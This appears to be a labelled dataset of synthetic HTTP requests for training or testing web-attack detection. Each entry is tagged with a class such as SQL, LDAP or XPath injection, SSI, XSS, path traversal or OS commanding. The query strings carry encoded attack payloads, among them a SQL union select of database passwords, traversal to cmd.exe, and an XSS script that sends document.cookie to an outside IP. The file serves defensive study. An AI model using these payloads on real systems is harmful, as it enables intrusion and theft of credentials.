UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/9.1 27.36.191.16
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 861 174.187.41.2 "rTsfbeu" 
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47180
Start - Id: 39285
class: SSI
GET /roSnOwiolhli/dFt9NAaZ/gvfr.jpg?twixteho=72453&ort=9Nittegn7c8t&murnWg8eotoDR=315439&ci2un6naswssza=xJs8XB0&satupeangoier=agawZ&58MC4admint5n=4760099&brRb=25&nfoitbnrrjna7=t_GhbL&oae5t8ysei=gr%3D%3D&repevqf=%3C%21--%23email+fromhost%3D%22www.e5aetV.com%22+tohost%3D%22mailbox.syniu.com%22+message%3D%22ltmHnz+sdflTes+hAr+eHr1t%22+fromaddress%3D%22Di7wnh.com%22+toaddress%3D%22A3c.oUe.com%22+subject%3D%22A%22+sender%3D%22oU.com%22+replyto%3D%222o56Rs.com%22+cc%3D%22dti%22+inreplyto%3D%22nb+7aga+rau%22+id%3D%22eApiemail%22+--%3E&fbtemo=fkuoHoOhm&e4icono9jpkRtY=624510&rsm4Stt=gr9ye+Tae+&Moahleio7tarta=65830&ty=shavinghformn HTTP/1.0
Host: 12.150.203.126
Connection: close
Accept: */*
Accept-Charset: gb2312, iso-8859-7;q=0.5, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: Oci-eahcoe;q=0.5
Cache-Control: no-cache
Client-ip: 178.60.27.113
Cookie: emlinsaeodats=829177;adminDkC=tbCGL31Y6KEz
Cookie2: $Version="4"
Date: Thu, 21 Feb 08 07:48:16 UTC
ETag: "CUCQhxU27N0NfVaIB"
Expect: teiRi02f=tsen
From: tdoqaue@tuogttti.uk
If-Modified-Since: Tue, 18 Sep 07 18:48:48 CET
If-Unmodified-Since: Mon, 01 Jan 07 22:50:26 GMT
If-Match: "r.g1wyS60s0P8I0v@"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.4
Pragma: ieyern=w
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: 2ehebr earold=vh8oet
Range: 419016-,344-
Referer: http://www.gntttae1.de/ilWao/wtlqeEh/fx24.php4
TE: chunked,deflate
Trailer: Upgrade
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 2.4; ss-lw; rv:2.9.5) Gecko/87609522
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 320x017
Via: FTP/9.9 www.neel.jpeg
Transfer-Encoding: deflate
Upgrade: tfe/7.8, osw/0.1, o7E/9.0, t4ii/3.0
Warning: 483 65.103.137.245:57 "ttdilrdtdatlrn" 
X-Forwarded-For: 79.195.23.179
X-Serial-Number: 729426151535484
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39285
Start - Id: 49904
class: XPathInjection
GET /a96PTOmjkZqTy7H8t5sh/c5/85ex2.nsf?_EoQ73=hioh&naalmyeNfobzp=7194753&eaitwj=uo3%27+++or++++di%2Flsr%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D847%5D+++++or+%27et%27+++%3D+++%27&hoaDOsj=cAv1VVv%40LMq&8alW1=74&Eomhbr0iln=krneg&aOvihAslt7slne=1n&nmfieaatt2yod=1rKVQD9F.Y&rhaoh4=8063&Iqtoo=bEevci%28%5Den21Poa&a5enoDnmaie=o%3Ee%7Cr&EOsx9153osxu=nbe9mIr+HincludeMddee6oinput&djfadrwa=oEsXjRh8 HTTP/1.0
Host: www.odzdiHN.biz
Connection: keep-alive
Accept: application/*;q=0.8, text/*, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tcv-bncab92i;q=0.6, w8zh-tdoyC;q=0.3, cree-ph;q=0.8
Cache-Control: no-transform
Client-ip: 46.208.216.230
Cookie2: $Version="213"
Date: Mon, 13 Oct 08 02:54:05 CET
If-Match: "rg_u.3caOA7OkZpsy"
Max-Forwards: 67
Authorization: Basic b25hbmNhbnI6U3NmYW9zWHY=
Referer: http://iwdkn0yR.st/fcEopo/tp9o3idw/it7i9zwe/z6Ide.nsf
User-Agent: Mozilla/5.9 (X11; U; SunOS sun4u 5.0; De-rn; rv:6.0.9) Gecko/87534122
Via: FTP/6.7 www.u20vtabt.shtml, 0.6 251.79.16.174, HTTP/8.7 www.Ubpatir.htm
Upgrade: anma/6.5, Quer/3.7, samre/6.1
X-Serial-Number: 70298520558

null

End - Id: 49904
Start - Id: 48772
class: XPathInjection
GET /Oeez/ez4E5hnfioA/p.6/sqneyr.bin?3ldiedUesmkn=rlxpQvNpF-&dzaFn=6647&wv1hliwuN5=8432&IXzaV0a=45+or++++1%3C++++cteh%2Fits3%2FTs%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D46%5D+or+395%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&9oenyzAxTd=l5pabivpeOeatraa7H&thOeswtoaeee=nnwOyPm&Qtyqay6osxOk9=brnAR%24g%28soe%25%5C&teirutShi2te5id=tatordbeua0nL HTTP/1.1
Host: www.Hi7riaaQo.gov
Connection: rtoi
Accept: */*
Accept-Charset: x-mac-arabic;q=0.2, iso-8859-15
Accept-Encoding: *
Accept-Language: n-iey2ww0, rlOek5n-o;q=0.1, hc6-Odoah;q=0.0
Cache-Control: pj3cit='x'
Client-ip: 127.213.245.188
Cookie: toCe1tO=5141;neivmdonp7hncr=936;nedtddamitkZyoP=r;cntnegnkecer=478918;nsA=2 apd
Cookie2: $Version="80"
Date: Mon, 09 Mar 09 24:48:49 UTC
ETag: "U@8.Y4lA2ChgR@R4apU"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Sat, 18 Nov 06 20:39:41 CET
If-Unmodified-Since: Sat, 29 Jul 06 16:34:01 CET
If-Match: *
If-None-Match: "NXcWJm3vnSdIGNZ8"
If-Range: Wed, 21 Feb 07 22:57:55 UTC
Max-Forwards: 4
MIME-Version: 1.8
Pragma: 00='do9v'
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: NTLM YWdldEhpaWVpdDhsaWlhdHRzZGRtdHRpMXdpYTl5aXNydHNsNW4=
Range: -333764,-7
Referer: /ieooe/mNOdro/dini/nneotd2e.ace
TE: trailers,trailers
Trailer: Trailer
User-Agent: b9YGwz http://www.isse4.uk
UA-CPU: MIPS
UA-Disp: 019,118,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0640x829
Via: 1.6 www.tatea.html:26111
Transfer-Encoding: compress
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 544 244.25.56.152:7455 "uiooceeania" 
X-Forwarded-For: 160.70.37.175
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48772
Start - Id: 45259
class: PathTransversal
GET /./? HTTP/1.1
Host: 27.190.14.200
Connection: atqrie
Accept: */*;q=0.8
Accept-Charset: isiri-3342;q=0.4, windows-1252;q=0.9, windows-1253;q=0.0, big5;q=0.9, iso-8859-4
Accept-Encoding: *;q=0.8
Accept-Language: tnfho1-vG6Zm;q=0.2
Cache-Control: min-fresh=44
Client-ip: 197.120.255.144
Cookie: ex=9lqeiwp-mNTi4Ho9;iikuqtfe=ntt;ksTb0ntgiw6=93208789
Cookie2: $Version="36"
Date: Wed, 26 Oct 05 17:11:41 CET
ETag: "aEx1_obfnEaMPvXi2"
Expect: 100-continue
From: geleR@t0uaaRegG.gov
If-Modified-Since: Mon, 05 Jan 09 23:26:35 CET
If-Unmodified-Since: Thu, 25 Oct 07 22:02:20 UTC
If-Match: "uj_ovQk5au_1.EvgGTS"
If-None-Match: *
If-Range: *
Max-Forwards: 363
MIME-Version: 1.7
Pragma: talghohn=geah
Proxy-Authorization: Digest qop=evai40
Authorization: Digest uri=/OlEer/oqnttuh/zeds/dbd2oril.bin
Range: -249,23568-43
Referer: http://www.7pulentb.gov/h8fst/hilDu.pl
TE: chunked
Trailer: Host
User-Agent: Mozilla/6.1 (Machintosh; U; PPC 5.7; Tb-i0; rv:0.4.8) Gecko/68217666
UA-CPU: 68000
UA-Disp: 783,7858,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: Ertrss/2.6 www.gthu.js:75962, 6.0 www.cdu2ird.shtml, HTTP/9.6 www.Ntt0teT.tiff
Transfer-Encoding: deflate
Upgrade: gztEeo/9.6, etg/6.8, 1l1n/5.4, 5ttel/4.2
Warning: 924 www.Tmlirlsa.shtml "t5eakntztrsthoinaeue" 
X-Forwarded-For: 95.222.138.243
X-Serial-Number: 67855229
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45259
Start - Id: 39087
class: LdapInjection
POST /16mtgB_Fu7lm/NQ7LinputY_aPincludejY08/oecGti/aKLrAj-/l5d3zZjml/ugSntetza1evMdhatad/nrgana7/akfb0d/16H@4St_YgqXBTXFt/adminm@U6open6t/r2tAny/ttzr5osioehsn.gif? HTTP/1.0
Content-Length: 70
Content-Language: lsude,entkeew,ml
Content-Encoding: gzip
Content-Location: /rs01w.jpeg
Content-MD5: Y3Jubm5vZnA1RWZuYXNreQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Oct 04 18:26:19 GMT
Last-Modified: Thu, 23 Oct 08 21:01:14 UTC
Host: www.dteo.ch:62894
Connection: rTurmd
Accept: video/mpeg
Accept-Charset: gb2312;q=0.0
Accept-Encoding: 
Accept-Language: rbs-c;q=0.2, 0GdICnec-tiUhatut;q=0.2, 1-2mmq;q=0.5, oosa-alB7eu;q=0.4, Bfdi-2jwtmu
Cache-Control: no-cache
Client-ip: 12.16.123.2
Cookie: ev78sshck=xd.VfIp;plz1cZJAMlogV=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="16"
Date: Wed, 10 May 06 01:29:04 CET
ETag: W/"52@7ef08sxYsYsK"
Expect: 100-continue
From: sqarh@agbp.net
If-Modified-Since: Sun, 29 Feb 04 05:25:41 UTC
If-Unmodified-Since: Wed, 07 Mar 07 15:49:53 UTC
If-Match: *
If-None-Match: "IZtJr26upA9ITxvFcd"
If-Range: *
Max-Forwards: 277
MIME-Version: 1.0
Pragma: no-cache
Authorization: Digest opaque="Srpe"
Range: 5646-401977,1107-6680,-60
Referer: /lb0oslzy/mc8trjt1/aocmc.jsp
TE: deflate,trailers
Trailer: Expect
User-Agent: 2MccbpfXud http://www.dt2gi.ch
UA-CPU: PowerPC
UA-OS: Win95
UA-Color: color32
UA-Pixels: 604x1864
Via: 2.9 150.126.212.133
Transfer-Encoding: identity
Upgrade: M1r2t/2.6, amimlh/2.2
Warning: 393 245.151.48.147:346 "eTeleaph" 
X-Forwarded-For: 138.193.124.167
X-Serial-Number: 173254856208744032
----: ------------
~~~~~: ~~~~~~~~~~~

RvPlhtpechoall0Z==[s&acsyrU87sk=53628121&tyd7teshovrphmf=eewes Ara

End - Id: 39087
Start - Id: 36991
class: LdapInjection
GET /bgtseAealgtecz/oF.tiff?Svsike=%29+++%28%7C++%28+++cn%3D*o++++%27brien*++++%29%28mail++++%3D*o%27brien*%29++++ HTTP/1.0
Host: www.oeyshhwLd.ch
Connection: close
Accept: audio/x-wav, image/gif;q=0.4, application/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: min-fresh=8
Client-ip: 9.220.179.73
Cookie: Tattqsyle=eao3h4
Cookie2: $Version="936"
Date: Mon, 23 Jan 06 22:38:09 GMT
ETag: W/"NxJqMEpv_fMr0aSVD"
Expect: uopsnzm=AsaaoEcr
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Tue, 05 Apr 05 12:42:11 GMT
If-Unmodified-Since: Tue, 17 Apr 07 07:30:31 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 05:56:45 UTC
Max-Forwards: 66
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ilmPs6"
Authorization: Basic aThpYWVoOlRvaXJvZQ==
Range: 84-,-422477,1197-5319
Referer: /eTgree/sx0aS/sclekrod.txt
TE: trailers
Trailer: Via
User-Agent: Mozilla/8.9 (compatible; MSIE 2.7; Linux i586; tzm6vknSgl; l3wnn)
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: aEa/0.0 183.241.29.154, 5.1 www.dsjaoa.jpg, FTP/1.4 www.aiypsR.html:4701
Transfer-Encoding: identity
Upgrade: Rtes2e/0.8, Uappi/6.8, oe526/7.2, eoop6g/8.7
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36991
Start - Id: 41840
class: SqlInjection
GET /YS/5HQk363XW/ohyrhMhten8/t6P4Vp9CjM.jpg?sttieof=rr6&ineoaXt=%27union+++select++PASSWORD++++from+DBA_PASSWORD%3B-- HTTP/1.0
Host: 167.65.206.235
Connection: tthaop
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, deflate;q=0.3
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 196.90.56.27
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="58"
Date: Thu, 15 Mar 07 05:28:03 CET
ETag: W/"sEO6-Hh4WcNew12P"
Expect: 3esf
From: rhserwr@eoSaan.it
If-Modified-Since: Tue, 11 Aug 09 16:41:20 GMT
If-Unmodified-Since: Sat, 01 Jan 05 21:53:37 UTC
If-Match: "wpeagd3IDuXBc1YC"
If-None-Match: *
If-Range: "Uwh5z.l.LfcAi4HSGr"
Max-Forwards: 37
MIME-Version: 1.6
Pragma: pncdaVt='fbnaente'
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: heea seltmfr=o7On
Range: -0842
Referer: /meuq2fe/rloh.jpg
TE: chunked;q=0.0,gzip;q=0.4,gzip;q=0.3
Trailer: Max-Forwards
User-Agent: aHBapsot
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: 2.7 www.n1sih.jpeg:44, 6.6 15.133.130.11
Transfer-Encoding: gzip
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 083 232.239.68.83 "ejcebsDaay0" 
X-Forwarded-For: 187.70.226.8
X-Serial-Number: 431124702375
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41840
Start - Id: 37868
class: LdapInjection
GET /igi/s4wviZhL/teerEnmYimsus/.adminiNW.cfm?VpJSZ-3iZb=858550&trstaomot=e0pC9doSgB&yfxswpe0t0Pme=y18U&wLZO=la%3Dl&anxtoiseNnn6et=r8D_Da&wrdwsdpisbe=ttnueymIsoar&ohlo8ii6pm=62906832&bzi=738&racb=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 204.245.165.106:80
Connection: stqne
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip
Accept-Language: s1ifs-FEaijuv2;q=0.5, d-rdphn
Cache-Control: no-cache
Client-ip: 22.110.9.101
Cookie: htpassRzZftp-iD=p1ApvWn;0hnYcttsnite=ebo
Cookie2: $Version="68"
Date: Tue, 09 Aug 05 10:45:58 GMT
ETag: W/"2FKzg9Sm9Ylt2ij82H"
Expect: 100-continue
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sat, 26 May 07 01:43:39 CET
If-Unmodified-Since: Wed, 31 Aug 05 15:26:00 GMT
If-Match: "ZCcjF3mjaH5DPP0fpZa"
If-None-Match: "cP6fnYiatwSIYB2Qot@"
If-Range: *
Max-Forwards: 086
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: vcyoe XEolGpxu=defga
Range: 89-,46-035533,8-609
Referer: /dxhey3i/epsp/rnlrmp/igme/q3nde4.wav
TE: gzip;q=0.4,deflate;q=0.3
Trailer: Max-Forwards
User-Agent: aErrsy
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: iNhtts/2.7 www.Trst.css:6819, 6.8 9.233.253.163
Transfer-Encoding: gzip
Upgrade: ebe0En/4.3, C7ar5/8.8
Warning: 785 154.219.196.57 "riredam4aosbhnieNsek" "Wed, 10 Jun 09 10:24:56 CET"
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37868
Start - Id: 45950
class: PathTransversal
GET /srmqven/t8h1dYHtp@/BLb_bUi/n6B/tWcA9Ffq2VMWQ@O2o/ds0iire3sRf/e1TUY0V/qyrseSa/6kaccess_logf6Z-RH.eaA/9hy1pvZtmphEGgY2X.html?qadcotlfte4xE=St%40%2Fe5oS0cs03&enrdhewdbnu=670370&yh0cdd=+e&ab=195745&zaaiPhhn1=djG&epfygtzi0t=ko%40V&DeruEn6tsvrenf=Operltmp4efdb%5Dkllsr&aFW=iwnda&ls=li5odhyetj0ne&n0GmN=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fanesitin%2Fllti%2Fnant%2Falelerorli.msf HTTP/1.0
Host: www.Ooooctn.it
Connection: close
Accept: video/mpeg;q=0.1, audio/basic;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: e-c;q=0.4, rrhem-merEc, o7bp-TdlzQ, t-vn
Cache-Control: max-stale=854
Client-ip: 81.34.102.44
Cookie: gbycitApalyj=92
Cookie2: $Version="028"
Date: Thu, 02 Nov 06 17:54:22 GMT
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: crtlt=umde;foerOz=oacmedeu
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Tue, 04 Oct 05 18:15:36 GMT
If-Unmodified-Since: Mon, 15 Mar 04 17:52:20 GMT
If-Match: "q2foPSNk1I8q8EYxL"
If-None-Match: "8IBIsprOc3jomCys"
If-Range: "u_NGsTs.ZIGXG.ViT"
Max-Forwards: 14
MIME-Version: 5.8
Pragma: lots=Ehtegor
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: tepn rgoni=edeefi5R
Referer: /Vdefrheb/KshHreoJ/usoae4p/emrrEA.gz
TE: deflate;q=0.7,trailers,deflate
Trailer: Accept
User-Agent: Mozilla/3.0 (compatible; Konqueror/4.3; Win 9x; reIctttce; xeel; uihtde9ee)
UA-CPU: PowerPC
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: 7.5 www.ngsae.css, 9.0 www.e7sto3m6.js
Transfer-Encoding: gzip
Upgrade: Eih/5.7, olse/5.3, eieecn/0.8
Warning: 240 244.77.211.173 "osnMh" 
X-Forwarded-For: 79.119.72.4
X-Serial-Number: 6933322511
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45950
Start - Id: 47712
class: XSS
GET /cNretaealotaiteroh/n0gelsin/f5wKElpqin.e/Rq/diy.ozivMQ.css?e2sytDAlXqht=pwlM2HsZoAFT&pogv=%3C%3Cscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F126.102.38.194%2Forelli.mspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E HTTP/1.1
Host: 226.208.202.138
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.1, identity;q=0.6, compress;q=0.0
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 62.177.179.140
Cookie: HeeamatrenbnE=659
Cookie2: $Version="5"
Date: Tue, 01 May 07 12:37:03 UTC
ETag: "SJrP0lOLvAUr@LC"
Expect: eAkt=es3Stmno
From: Nhksen@i9nwketoNw.gov
If-Modified-Since: Wed, 05 Jul 06 03:23:47 GMT
If-Unmodified-Since: Mon, 13 Dec 04 11:24:05 GMT
If-Match: "uTeelEarBVxwdPWk"
If-None-Match: *
If-Range: Sun, 19 Jul 09 09:28:34 UTC
Max-Forwards: 9247
MIME-Version: 1.4
Pragma: 5nkTai=e
Proxy-Authorization: Digest realm
Authorization: ehmc twAiie=heeev
Range: 2174-,56-,-57382
Referer: http://www.wCt9ds.ch/eel6A/wsaoky.jsp
TE: trailers,deflate
Trailer: Date
User-Agent: Mozilla/0.3 (compatible; MSIE 7.7; Unix; aiasl; iapo; eaE0ralb)
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5167x472
Via: 6.0 www.gem9.js, 4.9 68.33.210.1:260, djl/9.9 www.m5ord1.html
Transfer-Encoding: o8pah; ieeir=roso9a
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47712
Start - Id: 38735
class: LdapInjection
GET /tNa/fkPbJfWAsHbCHE/hpasswdzF_SeFMexec7ARj/nAd-Qao91BKpo5Z/7Q1RodlBmwMR@5uR2/yaitdotsAiwgaa/a8.tiff?ei1rsUeTmmah=n%3Ebere%3Ey&qhdab3o=199&yara=12%29%28%26%28objectClass%3Dt2Dm%29%28%7C%28sn++++%3D++nt%29%28cn%3Dnem++++J*%29%29&7o=3qdeor&ci5ocicm=50316072 HTTP/1.0
Host: www.2hee.gov
Connection: close
Accept: image/*;q=0.1, application/*, video/*;q=0.3
Accept-Charset: windows-1255, windows-1257;q=0.1
Accept-Encoding: 
Accept-Language: r-Ir2i4Ee;q=0.7, o9h-fmstdne, idAurjes-69leeg2a
Cache-Control: no-store
Client-ip: 132.36.253.148
Cookie: A0n=23;5yid=akkBP-3AAG@;ao=mKK0kYEhb;XCes=hc%;1zTodei2e=o En;ltngrhnN=nnih6r d
Cookie2: $Version="9"
Date: Fri, 16 Apr 10 21:43:21 UTC
ETag: "3@dn_UCGIlqI_Vtrv8"
Expect: Antlel0u=enxe
From: BtenoI@9Rnek.gov
If-Modified-Since: Tue, 06 Nov 07 15:34:13 GMT
If-Unmodified-Since: Fri, 16 Jul 04 04:14:24 GMT
If-Match: "2Q.2CGmKCecOF8C4ko"
If-None-Match: *
If-Range: Thu, 07 Aug 08 05:05:00 CET
Max-Forwards: 5
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest username="jobam3xe"
Authorization: Digest username="76nlskE"
Range: -753,93960-,-52
Referer: /nnyjhe/ewehs/e5roea/catt/Dco6e.sh
TE: chunked,gzip,trailers
Trailer: Authorization
User-Agent: enix/4.0.9.9.5
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: gda/7.2 255.10.246.150, 2.0 www.hiolr.css, 6.7 www.emfbSl.css
Transfer-Encoding: deflate
Upgrade: 5esn/7.7, ztlS/0.9, er6/2.0, rdryli/6.5, mla/1.5
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38735
Start - Id: 36463
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.tmw7srnmn.de
Connection: len8
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, gzip, deflate, identity;q=0.2, identity;q=0.9
Accept-Language: ynm-ychrArt5;q=0.4, lavm7sn-rHte;q=0.2, TestezC3-ftdore;q=0.6
Cache-Control: no-transform
Client-ip: 9.139.53.150
Cookie: teih7pNtwkvq=dJqaX_Kh;rtmrIDb1agittx=3264664;qn=rRW;dnad=n1eTe;oRLEsl9ewluren=1978958
Cookie2: $Version="0"
Date: Wed, 26 May 04 14:19:51 GMT
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: amnm6
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Sat, 31 Jul 04 24:12:45 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Jul 05 06:34:10 GMT
Max-Forwards: 0771
MIME-Version: 8.8
Pragma: Edyh=hnLhjm
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: Basic M2FwdHNvZHI6TG90YWVzTnM=
Range: 57-,410056-,436232-1281
Referer: http://www.98wHkei.it/IeaFro2/lucsoi/e0ityiw/easaEthA.cfm
TE: trailers,gzip
Trailer: Accept
User-Agent: hirlb (rZt4FD)
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: i2mes/6.4 154.201.149.205
Transfer-Encoding: gzip
Upgrade: fet/9.1, iro/2.9
Warning: 940 176.201.209.211 "dndrrAtk" "Mon, 05 Jan 04 22:49:43 CET"
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36463
Start - Id: 48671
class: XPathInjection
POST /c2UQbAU-i.LKBV/Idivsr/9y8MnTqaexecetOsv/3TjQ/4eErceg0heseBtnmn/ebsiaYmh1nUoehkio/AsyFHm8replace5EGeqS/ro-./stdt7oihwrhwceypa/icNz/YO5/tdHs7qrf.jpg? HTTP/1.1
Content-Length: 459
Content-Language: pg
Content-Encoding: deflate
Content-Location: http://www.l5atps.com/RvpuhE.htm
Content-MD5: dHR2TmVhdmltdGI3dDEyWQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 17:53:57 GMT
Last-Modified: Thu, 15 Jun 06 23:18:11 UTC
Host: 8.123.60.103:80
Connection: otwee
Accept: image/gif
Accept-Charset: utf-8
Accept-Encoding: 
Accept-Language: iaA-nmaupm2o, ssy-rbewrct, nhnzb-5e;q=0.1
Cache-Control: max-stale
Client-ip: 94.68.181.174
Cookie: sifiTpla=aueOaveui;0fpFLm=deRtT;sHhtiede=sesqor;;Saiir=l2;80JAHUcFh=eS+
Cookie2: $Version="97"
Date: Sat, 22 Sep 07 14:31:45 CET
ETag: "3.OeJwn1snCY3-uU"
Expect: fdei
From: e32rlse@ib5bceaa.org
If-Modified-Since: Thu, 13 Oct 05 23:37:38 GMT
If-Unmodified-Since: Thu, 02 Oct 08 06:32:48 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Jun 06 05:47:58 UTC
Max-Forwards: 2708
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic dHNlbTppbWhz
Authorization: 4snho cM2brwm1=rdelen
Range: 12-
Referer: /rjEbt.asp
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.5 (X11; U; Linux i586 2.5; aa-ns; rv:3.6.6) Gecko/21133139
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: 3.1 www.aosuie.js
Transfer-Encoding: SfrE; sstbi=bemc
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 32.231.214.148
X-Serial-Number: 9550547356245150782
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

1gud1xposition0gusr=toOV&swN10el=e~&Vz-dcCL_z=9315796134&wAvbscript.fTI=in&processing-instructionFboot.inidsQvbscript@p=8&iherla=51&ui7w=aathlink&Qp4_v=hncesirt@2en&aatStarieso=<edto&irheo9eoo=a]c1eosstylenat&a0swehaiir=nrhewo' or   (i <   count(me/child::text()) and  j     <  count(dd/child::comment())     and    k    <   count(fh/child::*)  )  or   'iztK'   = ' nrotohi'  or&ecuizi=Sttd4

End - Id: 48671
Start - Id: 39099
class: LdapInjection
POST /FgqZA/gNniirnVfle/Gn2pge/eeAaio/logHpcHfromz.jpeg? HTTP/1.0
Content-Length: 326
Content-Language: b8
Content-Encoding: identity
Content-Location: /or0gb/esse.txt
Content-MD5: V2V0ZXg4eHhvZ2lzZXRsbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Aug 05 13:07:41 CET
Last-Modified: Thu, 16 Sep 04 19:44:02 GMT
Host: www.i14jeen.com
Connection: close
Accept: video/*;q=0.2, image/gif, application/*;q=0.3
Accept-Charset: windows-1257, iso-8859-8-i, euc-jp
Accept-Encoding: 
Accept-Language: han7-7;q=0.2, a-5vhUa;q=0.8
Cache-Control: max-stale
Client-ip: 133.82.168.94
